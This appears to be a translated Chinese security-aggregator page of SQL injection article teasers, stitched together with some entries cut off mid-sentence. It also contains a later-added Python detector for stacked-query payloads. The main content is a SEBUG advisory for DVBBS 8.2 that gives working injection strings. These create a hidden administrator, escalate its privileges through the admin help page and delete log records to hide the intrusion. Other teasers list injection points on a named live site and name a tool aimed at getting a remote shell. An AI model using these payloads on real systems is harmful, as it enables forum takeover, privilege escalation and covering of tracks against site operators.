Author: yesu (http://hi.baidu.com/3hack_yesu
1. Injection points

http://yx.baidu.com/Hall/game/rank_fxq.asp?order=bean&page=2&sort=0&nick=

http://yx.baidu.com/down/down_game.asp?tn=1

Read full article

Author: 二月

There is nothing particularly novel in this article; it is mainly meant as a convenience and as an example of using a T-SQL cursor, for everyone's reference.

Suppose the SQL server we control is called X.X.X.X, and we are injecting a target where openrowset is available and we have SELECT permission on the system tables.

Connect with Query Analyzer and create the extended stored procedure:

Read full article

SFX-SQLi (Select For XML SQL injection) is a new SQL injection technique which allows extracting the whole contents of a Microsoft SQL Server 2005/2008 database in an extremely fast and efficient way.

This technique is based on the FOR XML clause, which is able to convert the content of a table into a single string, so its contents could be appended to some field injecting a subquery into a vulnerable input of a web applicatio
In addition to a new web application for testing, a new revision of the tool is published with some minor fixes and changes, including new functionality like access to other databases in the same server or support for user defined queries

Download source code and binaries from http://www.kachakil.com

Exploiting SQL Injection from Web Applications

This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database.

Download PDF

睛天电影系统 (Qingtian Movie System) SQL Injection Vulnerability 0day

Author: My5t3ry
Official site: http://www.qingtiandy.cn/
vulnerable: /look/template/wmv.asp

Code:
<%
IF Not ChkPost() Then
response.Redirect G_error_page_1
response.End()
End IF

Read full article

SSV ID: 15206
SEBUG Appdir: 动网 (DVBBS)
Published: 2009-12-31
Affected versions:
Dvbbs 8.2
Vulnerability description:
DVBBS is an open-source ASP forum program developed and maintained by WWW.ASPSKY.NET.
References:

None

Test method:
[www.sebug.net]
The programs (methods) provided by this site may be offensive in nature and are for security research and teaching only; use at your own risk!

Post a thread whose title is the SQL statement below, then click "comment". Any of 0 for neutral, 1 for support or 2 for against will do.
At that point the SQL statement is executed.
Database name: a','',1,'akai','2008-2-4','',2);update/**/dv_user/**/set/**/useremail=db_name()/**/where/**/username='akai'--

Add a front-end and back-end administrator: a','',1,'akai','2008-2-4','',2);update dv_user set UserGroupID=1 where username='akai';insert into dv_admin(Username,Password,Flag,Adduser)values('akai','965eb72c92a549dd',',4,','akai')--

Enter the admin backend, then obtain full privileges through a second injection: http://www.xxx.com/Admin/help.asp?action=view&id=1;update/**/dv_admin/**/set/**/flag='1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45'/**/where/**/username='akai'--

Clean up the database records (three tables): http://www.xxx.com/Admin/help.asp?action=view&id=1;delete/**/from/**/dv_log/**/where/**/l_username='akai';delete/**/from/**/dv_topic/**/where/**/PostUsername='akai';delete/**/from/**/Dv_Appraise/**/where/**/UserName='akai'--

(Because the delete statements are executed through backend injection, Dv_log still ends up with one record of the access to the backend help.asp file.)
SEBUG security recommendation:
None
Please refer to the official patch
www.dvbbs.net
// sebug.net [2010-01-07]
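The DVBBS payloads above all share one shape: a quote that breaks out of the string, a `;` that starts a second statement, and `/**/` comments standing in for spaces. The following is an added example (my code, not SEBUG's or DVBBS's) that scores request parameters for that shape so a log review or WAF rule can flag them; it is tested only on the payloads quoted in the advisory, and `normalize`, `stacked_query_score` and `scan_url` are hypothetical names.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumed helper: normalise a parameter the way classic ASP would see it once
# spliced into a SQL string: URL-decode, turn /**/ comments back into
# whitespace, collapse runs of spaces, lower-case for matching.
def normalize(value: str) -> str:
    value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip().lower()

# A second statement after ';' that names a table is the stacked-query
# signature; a trailing comment and a quote followed by ',' or ')' are the
# string-breakout signature of the post-title payload in the advisory.
STACKED = re.compile(r";\s*(update\s+\w+\s+set|insert\s+into|delete\s+from|exec\s+\w)")
TRAILER = re.compile(r"--\s*$|/\*\s*$")
STRING_BREAK = re.compile(r"'\s*[,)]")
INFO_FUNC = re.compile(r"\b(db_name|user_name)\s*\(")

def stacked_query_score(raw: str) -> int:
    """Score one parameter value; 2 or more means flag it for review."""
    v = normalize(raw)
    score = 0
    if STACKED.search(v):
        score += 2
    if TRAILER.search(v):
        score += 1
    if STRING_BREAK.search(v):
        score += 1
    if INFO_FUNC.search(v):
        score += 1
    return score

def is_suspicious(raw: str, threshold: int = 2) -> bool:
    return stacked_query_score(raw) >= threshold

def query_params(url: str) -> dict:
    """Split the query string on '&' only: the payload itself contains ';'."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, val = pair.partition("=")
        params.setdefault(key, []).append(val)
    return params

def scan_url(url: str) -> dict:
    """Return the highest score per query-string parameter of a request URL."""
    return {k: max(stacked_query_score(v) for v in vals)
            for k, vals in query_params(url).items()}
```

A plain forum title such as "how do I update my profile; insert a picture?" scores 0 because the keyword is not followed by a table clause, while every payload from the advisory scores at least 3.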

I was recently looking for SQL injection tools on Linux. Previously I had only used Sqlmap; today I tried Sqlninja. The tool's own introduction:

Sqlninja’s goal is to exploit SQL injection vulnerabilities on web applications that use Microsoft SQL Server as back end. It is released under the GPLv2.

There are a lot of other SQL injection tools out there but sqlninja, instead of extracting the data, focuses on getting an interactive shell on the remote DB server and using it as a foothold in the target network. In a nutshell, here’s what it does:

Read full article